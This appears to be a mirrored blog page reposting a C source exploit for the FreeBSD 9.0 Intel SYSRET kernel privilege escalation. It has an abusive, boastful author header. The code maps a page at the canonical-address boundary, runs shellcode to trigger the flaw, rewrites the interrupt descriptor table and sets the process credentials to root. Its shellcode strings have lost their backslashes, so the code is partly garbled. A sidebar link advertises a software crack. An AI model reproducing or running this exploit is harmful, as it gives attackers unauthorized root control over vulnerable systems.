zoukankan      html  css  js  c++  java
  • FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit

    /*
     * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit
     * Author by CurcolHekerLink
     * 
     * This exploit based on open source project, I can make it open source too. Right?
     * 
     * If you blaming me for open sourcing this exploit, you can fuck your mom. Free of charge :)
     *
     * Credits to KEPEDEAN Corp, Barisan Sakit Hati, ora iso sepaying meneh hekerlink,
     * Kismin perogeremer cyber team, petboylittledick, 1337 Curhat Crew and others at #MamaDedehEliteCurhatTeam
     * if you would like next private exploit leakage, just mention @MamahhDedeh
     *
     * Some people may feel harmed when we release this exploit :))
     *
     * p.s: Met idul Adha ya besok, saatnya potong leher dewa lo... eh maksudnya potong Sapisisasi :))
     *
     */
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <stdint.h>
    #include <unistd.h>
    #include <string.h>
    #include <sys/mman.h>
    #include <machine/cpufunc.h>
    #define _WANT_UCRED
    #include <sys/proc.h>
    #include <machine/segments.h>
    #include <sys/param.h>
    #include <sys/linker.h>
    #define TRIGGERSIZE 20
    #define BOUNCESIZE 18
    
    uintptr_t Xdivp, Xdbgp, Xbptp, Xoflp, Xbndp, Xillp, Xdnap, Xfpusegmp, Xtssp, Xmissingp, Xstkp, Xprotp, Xpagep, Xfpup, Xalignp, Xmchkp, Xxmmp;
    
    struct gate_descriptor * sidt()
    {
            struct region_descriptor idt;
            asm ("sidt %0": "=m"(idt));
            return (struct gate_descriptor*)idt.rd_base;
    }
    
    u_long matchsym(char *symname)
    {
            struct kld_sym_lookup ksym;
            ksym.version = sizeof (ksym);
            ksym.symname = symname;
            if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
                    perror("kldsym");
                    exit(1);
            }
            return ksym.symvalue;
    }
    
    void setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)
    {
            struct gate_descriptor *ip;
            ip = idt + idx;
            ip->gd_looffset = func;
            ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);
            ip->gd_ist = ist;
            ip->gd_xx = 0;
            ip->gd_type = typ;
            ip->gd_dpl = dpl;
            ip->gd_p = 1;
            ip->gd_hioffset = func>>16;
    }
    
    void payload()
    {
            printf("[+] Woohoo!!!
    ");
            exit(0);
    }
    
    void resetidt()
    {
            struct thread *td;
            struct ucred *cred;
            struct gate_descriptor *idt = sidt();
            setidt(idt, IDT_DE, Xdivp, SDT_SYSIGT, SEL_KPL, 0);
            setidt(idt, IDT_DB, Xdbgp, SDT_SYSIGT, SEL_KPL, 0);        
            setidt(idt, IDT_BP, Xbptp, SDT_SYSIGT, SEL_KPL, 0);
            setidt(idt, IDT_OF, Xoflp, SDT_SYSIGT, SEL_KPL, 0);
            setidt(idt, IDT_BR, Xbndp, SDT_SYSIGT, SEL_KPL, 0);
            setidt(idt, IDT_UD, Xillp, SDT_SYSIGT, SEL_KPL, 0);
            setidt(idt, IDT_NM, Xdnap, SDT_SYSIGT, SEL_KPL, 0);
            setidt(idt, IDT_FPUGP, Xfpusegmp, SDT_SYSIGT, SEL_KPL, 0);
            setidt(idt, IDT_TS, Xtssp, SDT_SYSIGT, SEL_KPL, 0);
            setidt(idt, IDT_NP, Xmissingp, SDT_SYSIGT, SEL_KPL, 0);
            setidt(idt, IDT_SS, Xstkp, SDT_SYSIGT, SEL_KPL, 0);
            setidt(idt, IDT_GP, Xprotp, SDT_SYSIGT, SEL_KPL, 0);
            setidt(idt, IDT_PF, Xpagep, SDT_SYSIGT, SEL_KPL, 0);
            setidt(idt, IDT_MF, Xfpup, SDT_SYSIGT, SEL_KPL, 0);
            setidt(idt, IDT_AC, Xalignp, SDT_SYSIGT, SEL_KPL, 0);
            setidt(idt, IDT_MC, Xmchkp, SDT_SYSIGT, SEL_KPL, 0);
            setidt(idt, IDT_XF, Xxmmp, SDT_SYSIGT, SEL_KPL, 0);
            
            asm ("mov %%gs:0, %0" : "=r"(td));
            
            cred = td->td_proc->p_ucred;
            cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
            cred->cr_groups[0] = 0;
            
            asm ("swapgs; sysretq;" :: "c"(payload));
    }
    
    void resolving()
    {
            Xdivp = (uintptr_t)matchsym("Xdiv");
            Xdbgp = (uintptr_t)matchsym("Xdbg");
            Xbptp = (uintptr_t)matchsym("Xbpt");
            Xoflp = (uintptr_t)matchsym("Xofl");
            Xbndp = (uintptr_t)matchsym("Xbnd");
            Xillp = (uintptr_t)matchsym("Xill");
            Xdnap = (uintptr_t)matchsym("Xdna");
            Xfpusegmp = (uintptr_t)matchsym("Xfpusegm");
            Xtssp = (uintptr_t)matchsym("Xtss");
            Xmissingp = (uintptr_t)matchsym("Xmissing");
            Xstkp = (uintptr_t)matchsym("Xstk");
            Xprotp = (uintptr_t)matchsym("Xprot");
            Xpagep = (uintptr_t)matchsym("Xpage");
            Xfpup = (uintptr_t)matchsym("Xfpu");
            Xalignp = (uintptr_t)matchsym("Xalign");
            Xmchkp = (uintptr_t)matchsym("Xmchk");
            Xxmmp = (uintptr_t)matchsym("Xxmm");
    }
    
    void trigger()
    {
            printf("[+] Crotz...
    ");
            uint64_t pagesize = getpagesize();
            uint8_t * mappedarea = (uint8_t*)((1ULL << 47) - pagesize);
            mappedarea = mmap(mappedarea, pagesize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
            if (mappedarea == MAP_FAILED) {
                    perror("mmap (trigger)");
                    exit(1);
            }
    
            char triggerpayload[] =
                    "xb8x18x00x00x00"
                    "x48x89xe3"
                    "x48xbcxefxbexadxdexefxbexadxde"
                    "x0fx05";
    
            uint8_t * offset_addr = mappedarea + pagesize - TRIGGERSIZE;
            memcpy(offset_addr, triggerpayload, TRIGGERSIZE);
    
            *(uint64_t*)(offset_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);
            printf("[+] Crotz...
    ");
            char bouncepayload[] =
                    "x0fx01xf8"
                    "x48x89xdc"
                    "x48xb8xefxbexadxdexefxbexadxde"
                    "xffxe0";
    
            uint8_t * bouncer = (uint8_t*)(0x900000000 | (Xpagep & 0xFFFFFFFF));
            size_t bouncer_allocsize = pagesize;
            if ((uint8_t*)((uint64_t)bouncer & ~(pagesize-1)) + pagesize < bouncer + BOUNCESIZE)
                    bouncer_allocsize += pagesize;
            if (mmap((void*)((uint64_t)bouncer & ~(pagesize-1)), bouncer_allocsize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)
            {
                    perror("mmap (bouncer)");
                    exit(1);
            }
            memcpy(bouncer, bouncepayload, BOUNCESIZE);
            *(uint64_t*)(bouncer + 8) = (uint64_t)resetidt;
            ((void (*)())offset_addr)();
    }
    
    int main(int argc, char *argv[])
    {
            printf("[+] SYSRET FUCKUP!!
    ");
            printf("[+] Start Engine...
    ");
            resolving();
            printf("[+] Crotz...
    ");
            trigger();
            return 0;
    }
  • 相关阅读:
    关于Maya Viewport 2.0 API 开发的介绍视频
    春节大假
    Some tips about the life cycle of Maya thread pool
    Can I compile and run Dx11Shader for Maya 2015 on my side?
    How to get current deformed vertex positions in MoBu?
    想加入全球首届的 欧特克云加速计划吗?
    三本毕业(非科班),四次阿里巴巴面试,终拿 offer(大厂面经)
    mac、window版编辑器 webstorm 2016... 永久破解方法。
    node 搭载本地代理,处理web本地开发跨域问题
    js 一维数组,转成嵌套数组
  • 原文地址:https://www.cnblogs.com/hookjoy/p/4156707.html
Copyright © 2011-2022 走看看